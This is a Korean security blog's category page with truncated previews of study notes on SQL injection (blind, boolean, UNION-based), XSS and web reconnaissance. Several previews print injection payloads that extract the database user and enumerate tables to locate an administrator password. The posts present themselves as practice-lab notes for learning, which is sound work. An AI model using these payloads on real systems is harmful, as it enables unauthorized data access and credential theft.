본문 바로가기

보안/WEB

(13)
[Chat GPT] SQL 인젝션 취약점에 대한 상세 가이드 Chat GPT가 설명해주는 SQL인젝션 취약점 설명 가이드입니다. [SQL Injection 취약점에 대한 자세한 안내서] SQL Injection 취약점은 웹 애플리케이션에 영향을 미치는 일반적인 보안 문제입니다. 이 블로그 게시물에서는 SQL Injection 공격에 대한 이해 및 방어에 대한 자세한 안내서를 제공 할 것입니다. [SQL Injection 이란 무엇입니까?] SQL Injection은 공격자가 웹 애플리케이션 데이터베이스에서 악의적 인 SQL 문을 실행할 수있는 공격 유형입니다. 이러한 유형의 공격은 공격자가 데이터베이스에 저장된 민감한 데이터에 액세스하거나 데이터베이스의 내용을 수정하거나 전체 데이터베이스를 삭제할 수 있기 때문에 특히 위험합니다. [SQL Injection 은 어..
[WEB보안] WebHacking 기초 - 네트워크관리 : ncpa.cpl - 사이트 정보 확인 : http://www.Netcraft.com Netcraft Internet Research, Cybercrime Disruption and PCI Security Services www.netcraft.com http://whois.nida.or.kr KISA 후이즈검색 whois.kisa.or.kr 한국인터넷진흥원 인터넷주소자원 검색(후이즈검색) 서비스 입니다. xn--c79as89aj0e29b77z.xn--3e0b707e - 과거 사이트 정보 : http://archive.org - 공인IP확인 / 위치확인 : http://www.findip.kr - DB School : http://www.w3schools.com/sql/ - SQL In..
[WEB보안] Blind SQL Injection_if조건문 DB 종류 : MySQL 정상 파라미터 값 : bordid=no0001 ​ bordid=no'||'0001 → 파라미터 값 중간에 연결연산자 입력 후 응답값 확인 ​ bordid=no'||0||'001 bordid=no'||select 0||'001 → 연결연산자 '0'(참) 및 '1'(거짓) 입력 후 응답값 확인 ※ 에러 발생 시 "|| = URL 인코딩" ​ bordid=no'||____||001 1. (select+user()) → user() 값 검색 ​ 2. (substr((select+user()),1,1) → user() 값 첫글자 한글자 요청 ​ 3. (ascii(substr((select+user()),1,1)>100) → user() 값 첫글자 한글자 요청 값이 아스키코드 값으로 100..
[WEB보안] Blind SQL Injection_case wher then 조건문 1. DB 환경 : Oracle ​ 2. 목적 : user 이름 및 Database 이름 확인 ​ 3. 공격 순서 : 1) 정상 파라미터 값 bordid = no0001 ​ 2) 파라미터 값 중간에 연결 연산자 입력 후 응답값 확인 bordid=no0'||'001 ​ 3) 응답 값 확인(참, 거짓) bordid=no0'||0||'001 // 참 bordid=no0'||1||'001 //거짓 ​ 4) SELECT 구문 사용 가능 여부 체크 boardid=no0'||select+0||'001 // 참 boardid=no0'||select+1||'001 //거짓 ​ 5) 연결 연산자 사이에 SQL 구문 삽입 bordid=no0'||______(SQL 구문)_______||001 ​ (1) (select+dat..
[WAB 보안] XSS(Cross Site Scripting) 취약점 ※ 해킹 관련 게시글은 공부한 내용을 정리를 위한 목적으로 게시하였습니다. 꼭 가상 서버 및 연습 환경이 제공된 일부 사이트를 제외한 일반 사이트에 적용 및 악용 절대 금지합니다. 또한 블로그에서는 절대로 책임지지 않습니다. [ XSS (Cross Site Scripting) ] 1. 공격 원리 - 사용자로부터 입력된 정보를 검증하지 않는 경우 공격자가 악성 Script입력 - 서버를 공격하는 것이 아닌 서버를 경유하여 클라이언트를 공격 - Cookie Access - DOM Access - Clipboard Access - Key logging 2. 공격 유형 1) Stored XSS - 악성스크립트를 취약한 웹서버에 저장 ( 웹게시판 , 방명록 ) - 해당 게시물 열람한 사람이 Victim - 악성코..
[WEB 보안] SQL 연결연산자로 DB 확인 Oracle : 'foo'||'bar' Microsoft : 'foo'+'bar' PostgreSQL : 'foo'||'bar' Mysql : 'foo'%20'bar' (공백 두 문자열사이 공백) CONCAT('foo','bar')
[WEB 보안] SQL Injection-UNION Attack_2 ※ 해킹 관련 게시글은 공부한 내용을 정리를 위한 목적으로 게시하였습니다. 꼭 가상 서버 및 연습 환경이 제공된 일부 사이트를 제외한 일반 사이트에 적용 및 악용 절대 금지합니다. 또한 블로그에서는 절대로 책임지지 않습니다. 1. 목적 : SQL 이외의 데이터베이스에 대한 데이터베이스 내용을 나열하는 SQL Injection 공격 2. 방법 : 1) 관리자의 비밀번호 찾기 (1) '+UNION+SELECT+NULL,NULL-- ​ (2) '+UNION+SELECT+'abc','def'-- ​ (3) '+UNION+SELECT+table.name,+NULL+FROM+information_schema.tables-- ​ (4) '+UNION+SELECT+column_name,+NULL+FROM+informa..
[WEB 보안] SQL Injection-UNION Attack_1 ※ 해킹 관련 게시글은 공부한 내용을 정리를 위한 목적으로 게시하였습니다. 꼭 가상 서버 및 연습 환경이 제공된 일부 사이트를 제외한 일반 사이트에 적용 및 악용 절대 금지합니다. 또한 블로그에서는 절대로 책임지지 않습니다. 1. 목표 : 다른 데이터베이스 테이블에서 데이터 검색 2. 방법 : 1) 에러가 발생하지 않을 때까지 NULL을 증가하여 컬럼 갯수 확인 (1) '+UNION+SELECT+NULL-- (2) '+UNION+SELECT+NULL,NULL-- ... ​ 2) NULL 열에서 'a'가 들어가도 에러가 발생하지 않은 곳 찾기 (1) '+UNION+SELECT+'a',NULL,NULL-- (2) '+UNION+SELECT+NULL,'a',NULL-- (3) '+UNION+SELECT+NUL..